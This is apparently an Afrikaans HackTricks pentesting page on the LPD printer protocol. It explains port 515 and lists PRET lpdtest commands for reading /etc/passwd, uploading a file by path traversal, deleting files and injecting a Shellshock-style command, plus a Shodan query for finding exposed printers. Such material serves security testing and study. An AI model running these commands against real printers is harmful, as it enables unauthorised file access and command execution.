Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Inleiding tot die LPD Protokol
In die 1980âs is die Line Printer Daemon (LPD) protokol ontwikkel in Berkeley Unix, wat later deur RFC1179 geformaliseer is. Hierdie protokol werk oor poort 515/tcp, wat interaksies deur die lpr opdrag moontlik maak. Die essensie van druk via LPD behels die stuur van ân beheerlĂȘer (om werksbesonderhede en gebruiker te spesifiseer) saam met ân data-lĂȘer (wat die drukinligting bevat). Terwyl die beheerlĂȘer die keuse van verskeie lĂȘerformate vir die data-lĂȘer toelaat, word die hantering van hierdie lĂȘers bepaal deur die spesifieke LPD-implementering. ân Algemeen erkende implementering vir Unix-agtige stelsels is LPRng. Opmerklik is dat die LPD-protokol uitgebuit kan word om kwaadwillige PostScript of PJL-drukwerk uit te voer.
Gereedskap vir Interaksie met LPD Drukkers
PRET stel twee noodsaaklike gereedskap bekend, lpdprint en lpdtest, wat ân eenvoudige metode bied om met LPD-ondersteunde drukkers te kommunikeer. Hierdie gereedskap stel ân reeks aksies in staat, van die druk van data tot die manipulasie van lĂȘers op die drukker, soos aflaai, opgelaai of verwyder:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Vir individue wat belangstel om die wĂȘreld van printer hacking verder te verken, kan ân omvattende hulpbron hier gevind word: Hacking Printers.
Shodan
port 515
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
HackTricks

